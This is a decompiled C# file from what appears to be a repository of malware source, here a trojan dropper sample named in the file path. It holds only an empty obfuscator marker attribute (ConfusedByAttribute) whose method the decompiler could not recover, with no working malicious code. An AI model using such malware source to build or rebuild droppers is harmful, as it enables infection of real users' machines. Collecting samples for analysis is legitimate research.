MalwareSourceCode/MSIL/Trojan-Dropper/Win32/I/Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6/ConfusedByAttribute.cs

17 lines
579 B
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: ConfusedByAttribute
// Assembly: scan, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C0A4408A-6830-4FA8-819B-3D801C5B54D7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6.exe
using System;
using System.Runtime.InteropServices;
internal class ConfusedByAttribute : Attribute
{
public ConfusedByAttribute([In] string obj0)
{
// ISSUE: unable to decompile the method.
}
}